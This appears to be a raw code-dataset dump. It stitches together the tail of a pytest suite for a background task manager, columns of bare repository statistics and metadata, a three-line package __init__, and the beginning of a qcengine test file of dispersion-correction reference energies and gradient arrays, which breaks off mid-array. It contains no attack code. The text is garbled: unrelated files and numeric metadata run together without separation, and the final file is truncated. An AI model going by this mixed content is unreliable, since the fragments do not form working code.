@pytest.mark.asyncio
async def test_build_response_reschedule(task_payload):
config = ConfigHelper()
manager = BackgroundTasksManager(config, None, None)
task = TaskPayload(
**task_payload(
TaskCategory.BACKGROUND, TaskType.PART_USAGE_FILE_REQUEST_PROCESSING, 'UFC-000',
),
)
future = asyncio.Future()
result = ProcessingResponse.reschedule(countdown=99)
future.set_result(result)
response = await manager.build_response(task, future)
assert response.task_id == task.task_id
assert response.result == result.status
assert response.countdown == result.countdown
@pytest.mark.asyncio
async def test_build_response_exception(mocker, task_payload):
config = ConfigHelper()
manager = BackgroundTasksManager(config, None, None)
manager.log_exception = mocker.MagicMock()
task = TaskPayload(
**task_payload(
TaskCategory.BACKGROUND, TaskType.PART_USAGE_FILE_REQUEST_PROCESSING, 'UFC-000',
),
)
future = asyncio.Future()
future.set_exception(Exception('Awesome error message'))
response = await manager.build_response(task, future)
assert response.task_id == task.task_id
assert response.result == ResultType.RETRY
assert 'Awesome error message' in response.output
manager.log_exception.assert_called_once()
@pytest.mark.asyncio
async def test_send_skip_response(mocker, task_payload):
config = ConfigHelper()
mocked_put = mocker.AsyncMock()
mocked_time = mocker.patch('connect.eaas.managers.background.time')
mocked_time.sleep = time.sleep
mocked_time.monotonic.side_effect = (1.0, 2.0)
manager = BackgroundTasksManager(config, None, mocked_put)
task = TaskPayload(
**task_payload(
TaskCategory.BACKGROUND, TaskType.PART_USAGE_FILE_REQUEST_PROCESSING, 'UFC-000', 1.0,
),
)
manager.send_skip_response(task, 'test output')
await asyncio.sleep(.01)
task.result = ResultType.SKIP
task.output = 'test output'
mocked_put.assert_awaited_once_with(task)
| 32.826827
| 98
| 0.647192
| 3,783
| 32,794
| 5.349194
| 0.05604
| 0.038595
| 0.005782
| 0.040225
| 0.918512
| 0.905268
| 0.880213
| 0.874234
| 0.863758
| 0.840927
| 0
| 0.030755
| 0.222663
| 32,794
| 998
| 99
| 32.859719
| 0.763063
| 0
| 0
| 0.748603
| 0
| 0.013408
| 0.239007
| 0.13722
| 0
| 0
| 0
| 0
| 0.031285
| 1
| 0
| false
| 0
| 0.010056
| 0
| 0.010056
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f408e76faea4f52a7470f9b6a719435a4eb77812
| 77
|
py
|
Python
|
coms/src/coms/__init__.py
|
tylerferrara/coms
|
5070b65836f0ff3538f787e4cbe46203355270ea
|
[
"MIT"
] | null | null | null |
coms/src/coms/__init__.py
|
tylerferrara/coms
|
5070b65836f0ff3538f787e4cbe46203355270ea
|
[
"MIT"
] | 5
|
2022-02-11T00:22:24.000Z
|
2022-02-15T01:31:28.000Z
|
coms/src/coms/__init__.py
|
tylerferrara/coms
|
5070b65836f0ff3538f787e4cbe46203355270ea
|
[
"MIT"
] | null | null | null |
from coms.sim import *
from coms.constants import *
from coms.utils import *
| 19.25
| 28
| 0.766234
| 12
| 77
| 4.916667
| 0.5
| 0.40678
| 0.474576
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.155844
| 77
| 3
| 29
| 25.666667
| 0.907692
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
f4689bbde0696cb3c63faedcf15b273645172e1e
| 45,529
|
py
|
Python
|
qcengine/programs/tests/test_dftd3_mp2d.py
|
dotsdl/QCEngine
|
51c7e0bfb28c826923eb38fcec84b9e45e90b3c4
|
[
"BSD-3-Clause"
] | 1
|
2019-10-22T20:28:03.000Z
|
2019-10-22T20:28:03.000Z
|
qcengine/programs/tests/test_dftd3_mp2d.py
|
ChemRacer/QCEngine
|
fcc4cba9a79f494378527eee1c7b218b33189e66
|
[
"BSD-3-Clause"
] | null | null | null |
qcengine/programs/tests/test_dftd3_mp2d.py
|
ChemRacer/QCEngine
|
fcc4cba9a79f494378527eee1c7b218b33189e66
|
[
"BSD-3-Clause"
] | null | null | null |
import copy
import numpy as np
import pytest
import qcelemental as qcel
import qcengine as qcng
from qcelemental.testing import compare, compare_recursive, compare_values, tnm
from qcengine.programs import empirical_dispersion_resources
from qcengine.testing import is_program_new_enough, using_dftd3, using_dftd3_321, using_mp2d, using_psi4, using_qcdb
@using_dftd3
@pytest.mark.parametrize("method", [
"b3lyp-d3",
"b3lyp-d3m",
"b3lyp-d3bj",
"b3lyp-d3mbj",
])
def test_dftd3_task(method):
json_data = {"molecule": qcng.get_molecule("eneyne"), "driver": "energy", "model": {"method": method}}
ret = qcng.compute(json_data, "dftd3", raise_error=True, return_dict=True)
assert ret["driver"] == "energy"
assert "provenance" in ret
assert "normal termination of dftd3" in ret["stdout"]
for key in ["cpu", "hostname", "username", "wall_time"]:
assert key in ret["provenance"]
assert ret["success"] is True
## Resources
ref = {}
dmm = ['dimer', 'mA', 'mB', 'mAgB', 'gAmB']
ref['eneyne'] = {}
ref['eneyne']['B3LYP-D2'] = dict(zip(dmm, [-0.00390110, -0.00165271, -0.00058118, -0.00165271, -0.00058118]))
ref['eneyne']['B3LYP-D3'] = dict(zip(dmm, [-0.00285088, -0.00084340, -0.00031923, -0.00084340, -0.00031923]))
ref['eneyne']['B3LYP-D3(BJ)'] = dict(zip(dmm, [-0.00784595, -0.00394347, -0.00226683, -0.00394347, -0.00226683]))
ref['eneyne']['PBE-D2'] = dict(zip(dmm, [-0.00278650, -0.00118051, -0.00041513, -0.00118051, -0.00041513]))
ref['eneyne']['PBE-D3'] = dict(zip(dmm, [-0.00175474, -0.00045421, -0.00016839, -0.00045421, -0.00016839]))
ref['eneyne']['PBE-D3(BJ)'] = dict(zip(dmm, [-0.00475937, -0.00235265, -0.00131239, -0.00235265, -0.00131239]))
ref['eneyne']['ATM'] = dict(
zip(dmm, [-0.000000175571, 0.000000216003, -0.000000055859, 0.000000216003, -0.000000055859]))
ref['eneyne']['MP2-DMP2'] = dict(
zip(dmm, [0.00632174635953, 0.00265335573161, 0.00344334929607, 0.00265335573161, 0.00344334929607]))
ref['ne'] = {}
ref['ne']['B3LYP-D3(BJ)'] = {'atom': 0.0}
ref['ne']['MP2-DMP2'] = {'atom': 0.0}
ref['ne']['ATM'] = {'atom': 0.0}
gref = {}
gref['eneyne'] = {}
gref['eneyne']['B3LYP-D2'] = dict(zip(dmm, [
np.array([
0.00000000000000E+00, 0.48816402308826E-03, -0.52644615172697E-03,
0.00000000000000E+00, -0.48816402308826E-03, -0.52644615172697E-03,
-0.73597441492032E-03, -0.91579236339614E-04, -0.84500341812746E-04,
0.73597441492032E-03, -0.91579236339614E-04, -0.84500341812746E-04,
0.73597441492032E-03, 0.91579236339614E-04, -0.84500341812746E-04,
-0.73597441492032E-03, 0.91579236339614E-04, -0.84500341812746E-04,
0.00000000000000E+00, 0.00000000000000E+00, -0.49418952404353E-03,
0.00000000000000E+00, 0.00000000000000E+00, 0.10115907534998E-02,
0.00000000000000E+00, 0.00000000000000E+00, 0.13962586025551E-02,
0.00000000000000E+00, 0.00000000000000E+00, -0.52276616130647E-03]).reshape((-1, 3)),
np.array([
0.00000000000000E+00, 0.60147644572925E-03, -0.48929640608715E-06,
0.00000000000000E+00, -0.60147644572925E-03, -0.48929640608715E-06,
-0.76078100143016E-03, -0.58483420364762E-04, 0.24464820304358E-06,
0.76078100143016E-03, -0.58483420364762E-04, 0.24464820304358E-06,
0.76078100143016E-03, 0.58483420364762E-04, 0.24464820304358E-06,
-0.76078100143016E-03, 0.58483420364762E-04, 0.24464820304358E-06]).reshape((-1, 3)),
np.array([
0.00000000000000E+00, 0.00000000000000E+00, -0.56705458935397E-03,
0.00000000000000E+00, 0.00000000000000E+00, 0.56456483332009E-03,
0.00000000000000E+00, 0.00000000000000E+00, 0.53090524837336E-03,
0.00000000000000E+00, 0.00000000000000E+00, -0.52841549233948E-03]).reshape((-1, 3)),
np.array([
0.00000000000000E+00, 0.60147644572925E-03, -0.48929640608715E-06,
0.00000000000000E+00, -0.60147644572925E-03, -0.48929640608715E-06,
-0.76078100143016E-03, -0.58483420364762E-04, 0.24464820304358E-06,
0.76078100143016E-03, -0.58483420364762E-04, 0.24464820304358E-06,
0.76078100143016E-03, 0.58483420364762E-04, 0.24464820304358E-06,
-0.76078100143016E-03, 0.58483420364762E-04, 0.24464820304358E-06,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00]).reshape((-1, 3)),
np.array([
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, -0.56705458935397E-03,
0.00000000000000E+00, 0.00000000000000E+00, 0.56456483332009E-03,
0.00000000000000E+00, 0.00000000000000E+00, 0.53090524837336E-03,
0.00000000000000E+00, 0.00000000000000E+00, -0.52841549233948E-03]).reshape((-1, 3)),
])) # yapf: disable
gref['eneyne']['B3LYP-D3'] = dict(zip(dmm, [
np.array([
0.67762635780344E-20, 0.19657186672293E-03, -0.23180716200687E-03,
0.50821976835258E-20, -0.19657186672293E-03, -0.23180716200687E-03,
-0.83754349667195E-04, 0.45844828386013E-04, -0.92969637976992E-04,
0.83754349667195E-04, 0.45844828386013E-04, -0.92969637976992E-04,
0.83754349667195E-04, -0.45844828386013E-04, -0.92969637976992E-04,
-0.83754349667195E-04, -0.45844828386013E-04, -0.92969637976992E-04,
0.00000000000000E+00, 0.00000000000000E+00, -0.11800508571549E-03,
-0.33881317890172E-20, -0.50821976835258E-20, 0.62302832736499E-03,
0.50821976835258E-20, 0.33881317890172E-20, 0.50037535445493E-03,
0.00000000000000E+00, -0.52939559203394E-22, -0.16990572018272E-03]).reshape((-1, 3)),
np.array([
0.20328790734103E-19, 0.24171499732116E-03, -0.20480842481032E-06,
-0.16940658945086E-20, -0.24171499732116E-03, -0.20480842481032E-06,
-0.10776189540054E-03, 0.78926689997812E-04, 0.10240421240516E-06,
0.10776189540054E-03, 0.78926689997812E-04, 0.10240421240516E-06,
0.10776189540054E-03, -0.78926689997812E-04, 0.10240421240516E-06,
-0.10776189540054E-03, -0.78926689997812E-04, 0.10240421240516E-06]).reshape((-1, 3)),
np.array([
0.00000000000000E+00, 0.00000000000000E+00, -0.21752286612122E-03,
0.00000000000000E+00, 0.00000000000000E+00, 0.21634915516554E-03,
0.00000000000000E+00, 0.00000000000000E+00, 0.17823532330490E-03,
0.00000000000000E+00, 0.00000000000000E+00, -0.17706161234922E-03]).reshape((-1, 3)),
np.array([
0.20328790734103E-19, 0.24171499732116E-03, -0.20480842481032E-06,
-0.16940658945086E-20, -0.24171499732116E-03, -0.20480842481032E-06,
-0.10776189540054E-03, 0.78926689997812E-04, 0.10240421240516E-06,
0.10776189540054E-03, 0.78926689997812E-04, 0.10240421240516E-06,
0.10776189540054E-03, -0.78926689997812E-04, 0.10240421240516E-06,
-0.10776189540054E-03, -0.78926689997812E-04, 0.10240421240516E-06,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00]).reshape((-1, 3)),
np.array([
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, -0.21752286612122E-03,
0.00000000000000E+00, 0.00000000000000E+00, 0.21634915516554E-03,
0.00000000000000E+00, 0.00000000000000E+00, 0.17823532330490E-03,
0.00000000000000E+00, 0.00000000000000E+00, -0.17706161234922E-03]).reshape((-1, 3)),
])) # yapf: disable
gref['eneyne']['B3LYP-D3(BJ)'] = dict(zip(dmm, [
np.array([
0.16940658945086E-20, -0.10896372137622E-03, -0.28496931787936E-03,
0.33881317890172E-20, 0.10896372137622E-03, -0.28496931787936E-03,
0.56547183189867E-04, -0.10791733716132E-03, -0.81750328898176E-04,
-0.56547183189867E-04, -0.10791733716132E-03, -0.81750328898176E-04,
-0.56547183189867E-04, 0.10791733716132E-03, -0.81750328898176E-04,
0.56547183189867E-04, 0.10791733716132E-03, -0.81750328898176E-04,
0.00000000000000E+00, 0.00000000000000E+00, 0.14698301085008E-03,
-0.16940658945086E-20, -0.33881317890172E-20, 0.43655907696000E-03,
0.00000000000000E+00, 0.33881317890172E-20, 0.23688438591518E-03,
0.00000000000000E+00, -0.52939559203394E-22, 0.76513477626168E-04]).reshape((-1, 3)),
np.array([
-0.33881317890172E-20, -0.54157860939394E-04, 0.11299781801723E-07,
-0.93173624197973E-20, 0.54157860939394E-04, 0.11299781801723E-07,
0.35880725530239E-04, -0.79323052619042E-04, -0.56498909008614E-08,
-0.35880725530239E-04, -0.79323052619042E-04, -0.56498909008614E-08,
-0.35880725530239E-04, 0.79323052619042E-04, -0.56498909008614E-08,
0.35880725530239E-04, 0.79323052619042E-04, -0.56498909008614E-08]).reshape((-1, 3)),
np.array([
0.00000000000000E+00, 0.00000000000000E+00, 0.45552310986933E-04,
0.00000000000000E+00, 0.00000000000000E+00, -0.45561218665227E-04,
0.00000000000000E+00, 0.00000000000000E+00, -0.69342175541743E-04,
0.00000000000000E+00, 0.00000000000000E+00, 0.69351083220036E-04]).reshape((-1, 3)),
np.array([
-0.33881317890172E-20, -0.54157860939394E-04, 0.11299781801723E-07,
-0.93173624197973E-20, 0.54157860939394E-04, 0.11299781801723E-07,
0.35880725530239E-04, -0.79323052619042E-04, -0.56498909008614E-08,
-0.35880725530239E-04, -0.79323052619042E-04, -0.56498909008614E-08,
-0.35880725530239E-04, 0.79323052619042E-04, -0.56498909008614E-08,
0.35880725530239E-04, 0.79323052619042E-04, -0.56498909008614E-08,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00]).reshape((-1, 3)),
np.array([
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.45552310986933E-04,
0.00000000000000E+00, 0.00000000000000E+00, -0.45561218665227E-04,
0.00000000000000E+00, 0.00000000000000E+00, -0.69342175541743E-04,
0.00000000000000E+00, 0.00000000000000E+00, 0.69351083220036E-04]).reshape((-1, 3)),
])) # yapf: disable
gref['eneyne']['PBE-D2'] = dict(zip(dmm, [
np.array([
0.00000000000000E+00, 0.34868860375520E-03, -0.37603298259607E-03,
0.00000000000000E+00, -0.34868860375520E-03, -0.37603298259607E-03,
-0.52569603453084E-03, -0.65413743213220E-04, -0.60357389750118E-04,
0.52569603453084E-03, -0.65413743213220E-04, -0.60357389750118E-04,
0.52569603453084E-03, 0.65413743213220E-04, -0.60357389750118E-04,
-0.52569603453084E-03, 0.65413743213220E-04, -0.60357389750118E-04,
0.00000000000000E+00, 0.00000000000000E+00, -0.35299253320442E-03,
0.00000000000000E+00, 0.00000000000000E+00, 0.72256485674234E-03,
0.00000000000000E+00, 0.00000000000000E+00, 0.99732761854534E-03,
0.00000000000000E+00, 0.00000000000000E+00, -0.37340441789063E-03]).reshape((-1, 3)),
np.array([
0.00000000000000E+00, 0.42962605217439E-03, -0.34949744879114E-06,
0.00000000000000E+00, -0.42962605217439E-03, -0.34949744879114E-06,
-0.54341502569968E-03, -0.41773873586195E-04, 0.17474872439557E-06,
0.54341502569968E-03, -0.41773873586195E-04, 0.17474872439557E-06,
0.54341502569968E-03, 0.41773873586195E-04, 0.17474872439557E-06,
-0.54341502569968E-03, 0.41773873586195E-04, 0.17474872439557E-06]).reshape((-1, 3)),
np.array([
0.00000000000000E+00, 0.00000000000000E+00, -0.40503901078976E-03,
0.00000000000000E+00, 0.00000000000000E+00, 0.40326061354193E-03,
0.00000000000000E+00, 0.00000000000000E+00, 0.37921805177386E-03,
0.00000000000000E+00, 0.00000000000000E+00, -0.37743965452603E-03]).reshape((-1, 3)),
np.array([
0.00000000000000E+00, 0.42962605217439E-03, -0.34949744879114E-06,
0.00000000000000E+00, -0.42962605217439E-03, -0.34949744879114E-06,
-0.54341502569968E-03, -0.41773873586195E-04, 0.17474872439557E-06,
0.54341502569968E-03, -0.41773873586195E-04, 0.17474872439557E-06,
0.54341502569968E-03, 0.41773873586195E-04, 0.17474872439557E-06,
-0.54341502569968E-03, 0.41773873586195E-04, 0.17474872439557E-06,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00]).reshape((-1, 3)),
np.array([
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, -0.40503901078976E-03,
0.00000000000000E+00, 0.00000000000000E+00, 0.40326061354193E-03,
0.00000000000000E+00, 0.00000000000000E+00, 0.37921805177386E-03,
0.00000000000000E+00, 0.00000000000000E+00, -0.37743965452603E-03]).reshape((-1, 3)),
])) # yapf: disable
gref['eneyne']['PBE-D3'] = dict(zip(dmm, [
np.array([
0.33881317890172E-20, 0.97730853016389E-04, -0.71901324069440E-04,
0.29646153153901E-20, -0.97730853016389E-04, -0.71901324069440E-04,
-0.31222554291636E-04, 0.29545643062003E-04, -0.67132324795951E-04,
0.31222554291636E-04, 0.29545643062003E-04, -0.67132324795951E-04,
0.31222554291636E-04, -0.29545643062003E-04, -0.67132324795951E-04,
-0.31222554291636E-04, -0.29545643062003E-04, -0.67132324795951E-04,
0.00000000000000E+00, 0.00000000000000E+00, -0.20867204655394E-04,
0.00000000000000E+00, 0.00000000000000E+00, 0.30651555323142E-03,
0.16940658945086E-20, 0.16940658945086E-20, 0.18769576731255E-03,
0.00000000000000E+00, 0.00000000000000E+00, -0.61012168565887E-04]).reshape((-1, 3)),
np.array([
0.33881317890172E-20, 0.11021182403760E-03, -0.93982803767757E-07,
-0.42351647362715E-21, -0.11021182403760E-03, -0.93982803767758E-07,
-0.48220259417857E-04, 0.52933097691669E-04, 0.46991401883879E-07,
0.48220259417857E-04, 0.52933097691669E-04, 0.46991401883879E-07,
0.48220259417857E-04, -0.52933097691669E-04, 0.46991401883879E-07,
-0.48220259417857E-04, -0.52933097691669E-04, 0.46991401883879E-07]).reshape((-1, 3)),
np.array([
0.00000000000000E+00, 0.00000000000000E+00, -0.99901515312115E-04,
0.00000000000000E+00, 0.00000000000000E+00, 0.99340886211351E-04,
0.00000000000000E+00, 0.00000000000000E+00, 0.67878928346081E-04,
0.00000000000000E+00, 0.00000000000000E+00, -0.67318299245317E-04]).reshape((-1, 3)),
np.array([
0.33881317890172E-20, 0.11021182403760E-03, -0.93982803767757E-07,
-0.42351647362715E-21, -0.11021182403760E-03, -0.93982803767758E-07,
-0.48220259417857E-04, 0.52933097691669E-04, 0.46991401883879E-07,
0.48220259417857E-04, 0.52933097691669E-04, 0.46991401883879E-07,
0.48220259417857E-04, -0.52933097691669E-04, 0.46991401883879E-07,
-0.48220259417857E-04, -0.52933097691669E-04, 0.46991401883879E-07,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00]).reshape((-1, 3)),
np.array([
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, -0.99901515312115E-04,
0.00000000000000E+00, 0.00000000000000E+00, 0.99340886211351E-04,
0.00000000000000E+00, 0.00000000000000E+00, 0.67878928346081E-04,
0.00000000000000E+00, 0.00000000000000E+00, -0.67318299245317E-04]).reshape((-1, 3)),
])) # yapf: disable
gref['eneyne']['PBE-D3(BJ)'] = dict(zip(dmm, [
np.array([
0.00000000000000E+00, -0.61939589939064E-04, -0.16066534797355E-03,
0.25410988417629E-20, 0.61939589939064E-04, -0.16066534797355E-03,
0.35330272921363E-04, -0.65816270722009E-04, -0.53748175167354E-04,
-0.35330272921363E-04, -0.65816270722009E-04, -0.53748175167354E-04,
-0.35330272921363E-04, 0.65816270722009E-04, -0.53748175167354E-04,
0.35330272921363E-04, 0.65816270722009E-04, -0.53748175167354E-04,
0.00000000000000E+00, 0.00000000000000E+00, 0.98332430764322E-04,
-0.25410988417629E-20, -0.33881317890172E-20, 0.25661736016373E-03,
0.00000000000000E+00, 0.00000000000000E+00, 0.13371752089002E-03,
0.00000000000000E+00, -0.26469779601697E-22, 0.47656084798449E-04]).reshape((-1, 3)),
np.array([
-0.25410988417629E-20, -0.31329250082804E-04, 0.61088639781542E-08,
-0.50821976835258E-20, 0.31329250082804E-04, 0.61088639781542E-08,
0.21959764459240E-04, -0.47293026603847E-04, -0.30544319890771E-08,
-0.21959764459240E-04, -0.47293026603847E-04, -0.30544319890771E-08,
-0.21959764459240E-04, 0.47293026603847E-04, -0.30544319890771E-08,
0.21959764459240E-04, 0.47293026603847E-04, -0.30544319890771E-08]).reshape((-1, 3)),
np.array([
0.00000000000000E+00, 0.00000000000000E+00, 0.25685884880777E-04,
0.00000000000000E+00, 0.00000000000000E+00, -0.25704336611069E-04,
0.00000000000000E+00, 0.00000000000000E+00, -0.41528315631943E-04,
0.00000000000000E+00, 0.00000000000000E+00, 0.41546767362234E-04]).reshape((-1, 3)),
np.array([
-0.25410988417629E-20, -0.31329250082804E-04, 0.61088639781542E-08,
-0.50821976835258E-20, 0.31329250082804E-04, 0.61088639781542E-08,
0.21959764459240E-04, -0.47293026603847E-04, -0.30544319890771E-08,
-0.21959764459240E-04, -0.47293026603847E-04, -0.30544319890771E-08,
-0.21959764459240E-04, 0.47293026603847E-04, -0.30544319890771E-08,
0.21959764459240E-04, 0.47293026603847E-04, -0.30544319890771E-08,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00]).reshape((-1, 3)),
np.array([
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.25685884880777E-04,
0.00000000000000E+00, 0.00000000000000E+00, -0.25704336611069E-04,
0.00000000000000E+00, 0.00000000000000E+00, -0.41528315631943E-04,
0.00000000000000E+00, 0.00000000000000E+00, 0.41546767362234E-04]).reshape((-1, 3)),
])) # yapf: disable
gref['eneyne']['ATM'] = dict(zip(dmm, [
np.array([
0.00000000000000E+00, -0.57988139838201E-06, -0.71628554331971E-06,
0.00000000000000E+00, 0.57988139838201E-06, -0.71628554331971E-06,
0.53149296386534E-06, -0.41638019417978E-06, 0.52694338024860E-06,
-0.53149296386534E-06, -0.41638019417978E-06, 0.52694338024860E-06,
-0.53149296386533E-06, 0.41638019417978E-06, 0.52694338024860E-06,
0.53149296386533E-06, 0.41638019417978E-06, 0.52694338024858E-06,
0.00000000000000E+00, 0.00000000000000E+00, -0.92557313363084E-06,
0.00000000000000E+00, 0.00000000000000E+00, 0.31010265235900E-06,
0.00000000000000E+00, 0.00000000000000E+00, 0.10194777599160E-05,
0.00000000000000E+00, 0.00000000000000E+00, -0.10792097129990E-05]).reshape((-1, 3)),
np.array([
0.00000000000000E+00, -0.45154573778694E-07, 0.11131133827146E-09,
0.00000000000000E+00, 0.45154573778707E-07, 0.11131133827146E-09,
0.10133274017225E-06, -0.72175367263952E-07, -0.55655669135736E-10,
-0.10133274017225E-06, -0.72175367263966E-07, -0.55655669135736E-10,
-0.10133274017227E-06, 0.72175367263952E-07, -0.55655669135736E-10,
0.10133274017227E-06, 0.72175367263966E-07, -0.55655669135736E-10]).reshape((-1, 3)),
np.array([
0.00000000000000E+00, 0.00000000000000E+00, 0.14079365564105E-07,
0.00000000000000E+00, 0.00000000000000E+00, -0.14067311316192E-07,
0.00000000000000E+00, 0.00000000000000E+00, 0.67277034390041E-07,
0.00000000000000E+00, 0.00000000000000E+00, -0.67289088637954E-07]).reshape((-1, 3)),
np.array([
0.00000000000000E+00, -0.45154573778694E-07, 0.11131133827146E-09,
0.00000000000000E+00, 0.45154573778707E-07, 0.11131133827146E-09,
0.10133274017225E-06, -0.72175367263952E-07, -0.55655669135736E-10,
-0.10133274017225E-06, -0.72175367263966E-07, -0.55655669135736E-10,
-0.10133274017227E-06, 0.72175367263952E-07, -0.55655669135736E-10,
0.10133274017227E-06, 0.72175367263966E-07, -0.55655669135736E-10,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00]).reshape((-1, 3)),
np.array([
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.00000000000000E+00,
0.00000000000000E+00, 0.00000000000000E+00, 0.14079365564105E-07,
0.00000000000000E+00, 0.00000000000000E+00, -0.14067311316192E-07,
0.00000000000000E+00, 0.00000000000000E+00, 0.67277034390041E-07,
0.00000000000000E+00, 0.00000000000000E+00, -0.67289088637954E-07]).reshape((-1, 3)),
])) # yapf: disable
gref['eneyne']['MP2-DMP2'] = dict(zip(dmm, [
np.array([
0.000000000000, 8.33766812971e-05, 0.000109143431777,
0.000000000000, -8.33766812971e-05, 0.000109143431777,
6.65762086716e-05, -8.48726541848e-06, -6.94161475862e-06,
-6.65762086716e-05, -8.48726541848e-06, -6.94161475862e-06,
-6.65762086716e-05, 8.48726541848e-06, -6.94161475862e-06,
6.65762086716e-05, 8.48726541848e-06, -6.94161475862e-06,
0.00000000000, 0.00000000000, -6.06356381132e-05,
0.00000000000, 0.00000000000, -0.000146587460686,
0.00000000000, 0.00000000000, 5.56226390549e-05,
0.00000000000, 0.00000000000, -3.89199447758e-05]).reshape((-1, 3)),
np.array([
0.00000000000, 6.40910926532e-05, -5.69353173759e-08,
0.00000000000, -6.40910926532e-05, -5.69353173759e-08,
6.40446102957e-05, -5.1224992828e-06, 2.84676586879e-08,
-6.40446102957e-05, -5.1224992828e-06, 2.84676586879e-08,
-6.40446102957e-05, 5.1224992828e-06, 2.84676586879e-08,
